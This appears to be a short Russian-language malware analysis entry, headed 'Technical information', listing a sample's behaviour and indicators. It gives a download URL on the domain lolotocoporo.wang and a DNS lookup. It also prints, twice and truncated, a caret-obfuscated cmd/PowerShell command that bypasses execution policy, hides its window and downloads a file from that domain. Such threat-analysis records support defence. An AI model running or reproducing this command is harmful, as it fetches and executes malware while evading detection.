Техническая информация
- http://lolotocoporo.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PowE^RS^h^ell^.exE^ ^-^e^Xec^utionpolIcY^ b^ypa^SS -N^O^PRo^Fi^le ^-WiNd^o^wst^yl^e^ ^H^I^Dde^n ^(nE^w-obj^eCt^ ^s^ys^t^e^M.N^et.We^BCLiEnT).do^W^nLO^adf^i^Le^('http://lolotoc...
- DNS ASK lo####coporo.wang
- '<SYSTEM32>\cmd.exe' /C "PowE^RS^h^ell^.exE^ ^-^e^Xec^utionpolIcY^ b^ypa^SS -N^O^PRo^Fi^le ^-WiNd^o^wst^yl^e^ ^H^I^Dde^n ^(nE^w-obj^eCt^ ^s^ys^t^e^M.N^et.We^BCLiEnT).do^W^nLO^adf^i^Le^('http://lolotoc...' (со скрытым окном)